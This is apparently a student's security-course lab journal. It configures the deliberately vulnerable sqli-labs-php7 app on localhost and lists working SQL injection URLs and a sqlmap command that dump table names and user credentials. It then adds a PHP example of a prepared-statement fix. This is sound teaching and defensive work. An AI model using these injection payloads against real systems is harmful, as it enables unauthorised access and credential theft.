Lab 9.1: SQLi Review - squatchulator/Tech-Journal GitHub Wiki

Lab 9.1 - SQLi Review

Configure MySQL

sudo systemctl enable mysqld
sudo systemctl start mysqld
sudo mysql_secure_installation

## Enter root password (I think it can be anything?)
## Enter 'n' for unix_socket authentication, 'y' for the rest.

mkdir -p ~/Documents/SEC-335/Week9
cd ~/Documents/SEC-335/Week9
git clone https://github.com/skyblueee/sqli-labs-php7.git
cd sqli-labs-php7

Add the following to sql-connections/db-creds.inc

<?php
$dbuser ='root';
$dbpass ='<password>'; // NOTE: this needs to be the same password you set up MySQL with
$dbname ="security";
$host ='localhost';
$dbname1 ="challenges";
?>
  • Start the application (from the directory we created above: ~/Documents/SEC-335/Week9/sqli-labs-php7) with php -S 127.0.0.1:8090 -t .
  • Now you should be able to visit http://127.0.0.1:8090 in the web browser.
  • Edit the file ~/Documents/SEC-335/Week9/sqli-labs-php7/Less-1/index.php and add the following:
Beneath "include("../sql-connections/sqli-connect.php");...

error_reporting(E_ALL);
ini_set('display_errors', 1);

Beneath "$row = mysqli_fetch_array($result, MYSQLI_BOTH);"...
printf("<br>raw_sql: %s<br>", $sql);
  • Now, start the SQL server back up and navigate to it via the web browser.
  1. Display the login name and password for an arbitrary user
  • 127.0.0.1:8090/Less-1?id=1
  2. Error condition when the number of columns is exceeded
  • 127.0.0.1:8090/Less-1?id=-1' union select 1,2--+
  3. A union select that displays your own value for login name and password
  • 127.0.0.1:8090/Less-1/?id=-1' union select 1,user(),database()%20--+
  4. Another union that displays the MySQL user and database
  • 127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
  5. A union that dumps all the tables in the current database
  • http://127.0.0.1:8090/Less-1/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()--+
  6. A union that dumps all the usernames and passwords
  • 127.0.0.1:8090/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+
  7. Figure out how to run sqlmap against the vulnerable URI: http://127.0.0.1:8090/Less-1?id=1
  • Run this using Medium Difficulty and Intermediate Enumeration.
  • Figure out how to dump the contents of the users table in the security database.
  • Provide a screenshot showing the results of dumping the users table.
    • sqlmap -u 'http://127.0.0.1:8090/Less-1/?id=1' -D security -T users --level 2 --risk 2 --dump
    • Say yes to all prompts
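Every exercise above works for the same reason: the `id` parameter is spliced into the SQL text, which is exactly what the `raw_sql` printf added to Less-1 makes visible. The following is an added illustration (not code from sqli-labs-php7 or from this journal) that puts that pattern next to a parameterized rewrite. The query shape, the `users`/`username`/`password` names and the connection values are assumptions taken from the lab setup above, not copied from the project's source.

```php
<?php
// Added example: not code from sqli-labs-php7 or from this journal.
// Contrasts the string-built query the Less-1 exercises depend on with a
// parameterized rewrite. Query shape, the users/username/password names and
// the connection values are assumptions based on the lab setup above.
declare(strict_types=1);

// Surface driver errors as exceptions instead of silently returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Vulnerable pattern: $id is interpolated into the SQL text, so a value like
 *   -1' union select 1,user(),database()--
 * replaces the intended WHERE clause with the attacker's SELECT.
 */
function fetchUserVulnerable(mysqli $conn, string $id): ?array
{
    $sql = "SELECT id, username, password FROM users WHERE id='$id' LIMIT 0,1";
    $row = $conn->query($sql)->fetch_assoc();
    return is_array($row) ? $row : null;
}

/**
 * Hardened: the statement text is fixed at prepare time and $id travels as a
 * bound integer, so quotes, comments or UNION in the input cannot change the
 * statement's structure. Shape validation comes first; the password column is
 * never selected, and neither the query nor driver errors are echoed back.
 */
function fetchUserSafe(mysqli $conn, string $rawId): ?array
{
    // Less-1 ids are small positive integers; reject anything else up front.
    if ($rawId === '' || strlen($rawId) > 10 || !ctype_digit($rawId)) {
        return null;
    }
    $id = (int) $rawId;

    $stmt = $conn->prepare('SELECT id, username FROM users WHERE id = ? LIMIT 1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd (default in PHP 7+)
    $stmt->close();
    return is_array($row) ? $row : null;
}

// Usage sketch (constructed): credentials assumed to match sql-connections/db-creds.inc.
$conn = new mysqli('localhost', 'root', '<password>', 'security');
$row = fetchUserSafe($conn, $_GET['id'] ?? '');
if ($row === null) {
    http_response_code(404);   // same response for "no such id" and for malformed input
    exit('not found');
}
echo 'Your Login name: ', htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
```

With the prepared statement in place, each payload from items 2 to 6 is either rejected by the shape check or bound as a literal that matches no row, and the page returns the same 404 in both cases. The `display_errors` and `raw_sql` lines added to Less-1 are useful while learning, but they are also the oracle that item 2 relies on: the "different number of columns" error is what lets an attacker count columns, so neither belongs in an application that faces real users.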